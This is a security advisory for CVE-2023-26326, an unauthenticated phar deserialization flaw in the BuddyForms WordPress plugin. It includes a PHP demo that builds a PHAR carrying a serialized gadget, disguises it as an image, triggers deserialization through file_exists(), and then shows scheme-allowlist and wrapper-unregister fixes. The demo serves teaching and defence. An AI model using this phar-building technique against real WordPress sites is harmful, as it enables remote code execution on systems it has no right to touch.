PT-2023-20614 · WordPress · Buddyforms

Joshua Martinelle · Published 2023-02-23 · Updated 2025-02-02 · CVE-2023-26326

CVSS v3.1: 9.8 (Critical)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: BuddyForms WordPress plugin, versions prior to 2.7.8

Description: The plugin contains an unauthenticated insecure deserialization flaw. Attacker-controlled input reaches a PHP filesystem operation without the stream wrapper being restricted, so an unauthenticated attacker can supply a phar:// path. When PHP opens the archive through that wrapper it unserializes the metadata stored in the archive, instantiating arbitrary PHP objects of the attacker's choosing. On its own this is an object-instantiation primitive; it becomes remote code execution or another concrete impact only when a usable POP chain (gadget classes with exploitable magic methods such as __destruct, __wakeup or __toString) is present in the plugin, in WordPress core, or in another installed plugin or theme. Note that PHP 8.0 and later no longer unserialize phar metadata automatically from filesystem functions, so this trigger path applies to PHP 7.x (or to code that calls Phar::getMetadata() explicitly).

Recommendations: Update BuddyForms to version 2.7.8 or later. Until the update can be applied, restrict access to the plugin functionality that accepts this input. Because the deserialization is triggered by PHP's filesystem functions resolving the phar:// wrapper, rejecting any scheme other than http(s) in the affected input, or unregistering the phar stream wrapper in PHP, blocks the trigger and is a more targeted stopgap.
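The following is an added illustration, not code from BuddyForms or from this advisory, of the mechanism described above: a phar:// path handed to an ordinary PHP filesystem function, a hypothetical gadget class standing in for a POP chain, and the scheme check that refuses such input. The class and function names, the archive location and the gadget's properties are assumptions made for the demo; it needs the PHP CLI started with phar.readonly=0 so the archive can be written.

```php
<?php
// Added illustration (not BuddyForms code, not the advisory's exploit): a phar://
// path reaching a plain PHP filesystem call unserializes the archive's metadata.
// All class/function names and paths here are hypothetical.
//
// Run:  php -d phar.readonly=0 phar_demo.php
// On PHP 7.x the vulnerable call prints the gadget line; on PHP >= 8.0 it does not,
// because filesystem functions no longer unserialize phar metadata automatically.

declare(strict_types=1);

// Hypothetical gadget: a class the application already loads whose magic methods
// do something useful for an attacker. Real POP chains usually rely on __destruct
// or __toString of real application classes; __wakeup is used here because it
// fires only on unserialize(), which keeps the demo output unambiguous.
class CacheEntry
{
    public $path = '';
    public $data = '';

    public function __wakeup(): void
    {
        echo "[gadget] CacheEntry unserialized; path={$this->path}\n";
    }
}

// Attacker side: build a PHAR whose metadata is a serialized CacheEntry, then give
// it a harmless-looking name. The phar:// wrapper does not care about the extension.
function buildMaliciousPhar(string $dir): string
{
    $pharPath = $dir . '/payload.phar';     // Phar needs a .phar name at creation time
    @unlink($pharPath);
    $phar = new Phar($pharPath);
    $phar->startBuffering();
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->addFromString('dummy.txt', 'x');
    $gadget = new CacheEntry();
    $gadget->path = '/var/www/html/wp-content/uploads/x.php';   // hypothetical target
    $gadget->data = '<?php /* attacker payload would go here */';
    $phar->setMetadata($gadget);            // stored serialize()d in the manifest
    $phar->stopBuffering();
    unset($phar);                           // release the handle before renaming

    $disguised = $dir . '/avatar.jpg';
    rename($pharPath, $disguised);
    return $disguised;
}

// Vulnerable pattern: attacker-controlled "URL" handed straight to a filesystem
// function. file_exists(), is_file(), filesize(), getimagesize(), file_get_contents()
// all resolve stream wrappers, so on PHP < 8.0 a phar:// path triggers
// unserialize() of the metadata before a single byte of content is read.
function vulnerableImageCheck(string $url): bool
{
    return file_exists($url);
}

// Hardened: allow only http(s) URLs (WordPress code can use wp_http_validate_url()
// for the same purpose). This rejects phar://, file://, data://, ftp:// and the rest.
function isAllowedImageUrl(string $url): bool
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return false;
    }
    return filter_var($url, FILTER_VALIDATE_URL) !== false;
}

$disguised = buildMaliciousPhar(sys_get_temp_dir());
$payload   = 'phar://' . $disguised . '/dummy.txt';

echo "vulnerable check: ";
var_dump(vulnerableImageCheck($payload));

echo "hardened check:   ";
var_dump(isAllowedImageUrl($payload));

// Defense in depth for code you cannot patch or audit: remove the wrapper entirely,
// after which every phar:// access fails without touching the archive.
stream_wrapper_unregister('phar');
echo "after unregister: ";
var_dump(@file_exists($payload));
```

On PHP 7.x the vulnerable call prints the gadget line before it returns, while the hardened check refuses the path without opening anything; after stream_wrapper_unregister('phar') even the vulnerable function cannot reach the archive. The unregister call is a blunt, process-wide control that also disables any legitimate phar:// use in the same PHP process, so the scheme allowlist in application code is the preferred fix and the unregister is a stopgap for an unpatched server.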

Weakness Enumeration

Deserialization of Untrusted Data

Related identifiers

CVE-2023-26326

Affected products

Buddyforms